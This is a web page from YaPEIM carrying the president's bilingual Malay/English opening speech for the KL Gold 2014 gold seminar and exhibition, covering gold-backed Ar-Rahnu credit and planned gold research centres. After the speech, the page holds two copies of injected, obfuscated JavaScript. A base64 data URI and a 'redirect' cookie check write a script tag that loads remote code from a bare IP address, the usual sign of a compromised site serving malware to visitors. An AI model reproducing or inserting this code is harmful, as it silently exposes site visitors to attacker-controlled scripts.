YaPEIM » Majlis Perasmian KL Gold 2014

Terkini

Majlis Perasmian KL Gold 2014

Ucapan perasmian Dato Presiden YaPEIM di Majlis Perasmian KL Gold 2014 di KLCC.

1. YB Mejar Jeneral Dato’ Seri Jamil Khir Hj Baharom (Menteri Di Jabatan Perdana Menteri);

2. Dato’ Hjh Zaleha Hussein (Timbalan Presiden & Timbalan Pengerusi Lembaga Pemegang Amanah YaPEIM);

3. Dato’ Abibullah Samsuddin (Ketua Pengarah YaPEIM);

4. Ahli-ahli LPA dan Pengurusan YaPEIM;

5. Pengerusi & Ahli-ahli Seketariat Serantau Ar Rahnu

6. Wakil-wakil daripada Penganjur Dalam & Luar Negara

7. Pembentang Kertas Kerja

8. Peserta-peserta pameran KL Gold 2014

9. Tuan-tuan & puan-puan yang dihormati sekalian.

Assalamu’alaikum Wr Wbth

ALU ALUAN

1. Bagi pihak YaPEIM, saya ingin mengalu-alukan kesudian YB Mejar Jeneral Dato’ Seri Jamil Khir Baharom, Menteri Di JPM Mewakili YAB Perdana Menteri Malaysia, untuk hadir,  juga sudi menjadi tetamu utama untuk menyampaikan Ucap Utama mewakili YAB Perdana Menteri dan seterusnya menyempurnakan KLGOLD 2014;

2. Mewakili YaPEIM, saya mengucapkan berbanyak terima kasih di atas sokongan rakan-rakan penganjur dari dalam dan luar negara – Terima kasih dan selamat datang.

Let me also extend a Big Thank-you to all our generous supporters sponsors, both local and international. To all the representatives, from World Gold Council, the Regional Ar-Rahnu Secretariat, Federations of Goldsmiths & Jewellers Associations of Malaysia, Malaysian Nuclear Agency, Malaysian Institute of Accountants, SME Bank, Ministry of Education, Ministry of Tourism and Culture and Suruhanjaya Koperasi Malaysia (Malaysian Co-operative Societies Commission),

Thank you and welcome to KLGOLD 2014.

3. Bagi pihak YaPEIM, saya juga mengalu-alukan komitmen dan penyertaan semua pihak termasuk pembentang kertas, moderator dan peserta Seminar dan Pameran, yang telah memungkinkan KLGOLD 2014 ini dapat dilangsungkan dengan jayanya.

On behalf of YaPEIM I would also like to welcome everyone, including paper presenters, moderators and participants to our international seminar and exhibition. Your presence and commitments will certainly make KLGOLD 2014 a success, InsyaAllah.

YB Dato’ Seri,

4. Penganjuran KLGOLD ini adalah satu lagi  langkah YaPEIM untuk  melihat dan meletakkan kedudukan emas yang sememangnya merupakan   suatu   galian yang mempunyai keistimewaan tersendiri,  diterima, malah menjadi rebutan dan dicari oleh hampir semua golongan masyarakat, samada di dalam sektor formal atau tidak formal.

The very making of KLGOLD 2014 into a reality is, yet, another positive and forward-looking step taken by YaPEIM to further enhance and strengthen the role of gold, a valueable  mineral, universally so that it retains its attractive captivating power to all, both in the formal and informal sectors.

YB Dato’ Seri dan Hadirin sekelian,

5. Dalam konteks YaPEIM, seperti yang YB Dato’ Seri maklum bahawa   emas dan galian bernilai yang dikenalpasti, menjadi subjek yang mula ditekuni, sejak  Ar-Rahnu YaPEIM diperkenalkan pada tahun 1993 yang lalu. Oleh kerana emas dan galian bernilai ini menjadi subjek yang sangat istimewa, malah telah menjadi asas kepada pemberian kredit di bawah Ar Rahnu YaPEIM.

Atas dasar itu juga YaPEIM telah mengambil langkah proaktif dalam memastikan pengurusan dan warga YaPEIM menguasai ilmu dan maklumat serta kemahiran berhubung dengan emas dan galian bernilai ini. Warga kerja institusi ini yang terdiri daripada ribuan warganya dilatih untuk mengenali mutu emas khususnya dan galian bernilai yang lain, melalui pelbagai kaedah samada tradisi hinggalah kaedah yang paling terkini. Malah kajian-kajian dari pelbagai aspek terus dilakukan dengan kerjasama institusi yang mempunyai autoriti (authority) dan berkepentingan di bidang berkaitan samada di dalam dan di luar negara.

6. Sebagai langkah memperkukuhkan keyakinan berhubung dengan hala tuju dan penglibatan khususnya dalam konteks penguasaan ilmu dan kemahiran berhubung dengan emas dan galian bernilai ini, maka langkah kehadapan yang telah diambil oleh YaPEIM ialah dengan menubuhkan sebuah panel penasihat bagi galian bernilai ini yang diberi nama Panel Penasihat Teknologi Emas dan Galian Bernilai. Keanggotaan panel ini terdiri daripada individu yang mempunyai keahlian berhubung dengan emas dan galian bernilai termasuk anggota yang  mewakili institusi yang mempunyai autoriti dan institusi yang menekuni bidang berkaitan seperti Agensi Nuklear Malaysia, Jabatan Standard Malaysia, Kementerian Perdagangan Dalam Negeri, Koperasi dan Kepenggunaan (KPDNKK), SIRIM, USM dan  INPUT YaPEIM bertindak sebagai Urusetia.

7. Sehingga kini diantara tumpuan utama yang diberikan perhatian oleh panel ini ialah :

Pertama: Membantu YaPEIM memastikan semua kaedah yang digunakan dalam aspek pengujian emas mempunyai tahap minimum standard pengujian yang diperakukan;

Kedua: Membantu YaPEIM mengenalpasti kaedah dan teknologi terkini bagi  menguji tahap ketulenan emas;

Ketiga: Membantu YaPEIM mengenalpasti kaedah dan teknologi pengujian emas yang memenuhi keperluan SOP yang diiktiraf di bawah MS ISO yang berkaitan;

Keempat: Membantu YaPEIM  mengenalpasti kaedah dan teknologi bagi mengatasi unsur-unsur penipuan yang terkait dengan emas dan galian bernilai; dan

Kelima: Membantu YaPEIM dan melaksanakan penyelidikan yang berterusan bagi memajukan kaedah dan teknologi baru yang bersesuaian berkaitan dengan Emas dan Galian Bernilai.

8. Berasaskan kepada perkembangan terkini, disamping semua langkah yang sedang dilaksanakan akan diteruskan, kini YaPEIM mula memberi perhatian baru kepada agenda pengukuhan aspek-aspek memajukan industri yang terkait dengan emas dan galian bernilai ini, melalui langkah-langkah berikut:

Jangkamasa (1 hingga 2 tahun)

Pertama:Mewujudkan Makmal PenyelidikanEmas; dan

Kedua: Mewujudkan Pusat Pencerakinan Tidamemusnah (Non Destructive Assaying Centre) ;

Jangkamasa ( 3 hingga 5 tahun)

Pertama: Mewujudkan YaPEIM’s KL GOLD CENTRE (Pusat Emas Antarabangsa YaPEIM); dan

Kedua: Berusaha Mewujudkan Komuniti E-Gold (E-Gold Community).

9. Sesungguhnya kejayaan program YaPEIM selama ini sangat terkait dengan penerimaan dan sokongan masyarakat terhadap usaha murni yang dilakukan, dan yang lebih utama  adalah  YAB Dato’ Sri Perdana Menteri sendiri selaku penaung YaPEIM dan YB Dato’ Seri sendiri selaku Menteri YaPEIM, sentiasa memberi perhatian terhadap perjalanan YaPEIM selama ini.  Sokongan seperti ini pastilah menjadi penyuntik semangat yang amat berharga (tingginya nilai sokongan ini bak nilai segunung emas), yang manfaat akhirnya adalah masyarakat terbanyak. Terima kasih YB Bato’ Seri.

10. Diakhir ini izinkan saya menyampaikan ucapan setinggi terima kasih sekali lagi diatas kesudian YB Dato Seri untuk hadir, seterusnya sudi pula menyampaikan Ucap Utama yang bertajuk “Gold: Sustaining Future Growth and Challenges” dan juga menyempurnakan KLGOLD 2014 ini.

11. Terima kasih juga kepada semua pihak yang turut menjadikan KLGOLD 2014 sebagai suatu realiti.

Didoa dan diharapkan KLGOLD 2014 akan memberi impak tersendiri dalam perjalanan kita meletakkan peranan Emas dan Galian Bernilai dalam menentukan kelangsungan dan pertumbuhan masa depan ekonomi dan kelangsungan sistem ekonomi yang lebih stabil dan kesejahteraan manusia yang lebih utuh.

Once again, I feel honoured to express my sincere thanks to all of you for making KLGOLD 2014 a reality.

Finally, I beseech Allah’s blessings and hope that KLGOLD 2014 will generate a strong impact in enhancing the role of gold and other valueable minerals in sustaining the future growth of our nation’s economy, steering it into one that is not only robust, but overflowing with benefits that create a prosperous and peace loving united nation.

Wishing all of you a very pleasant seminar.

Selamat Berseminar,

Wabillahi Taufiq Wal Hidayah

Wassalamu’alaikum Wr Wbth.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top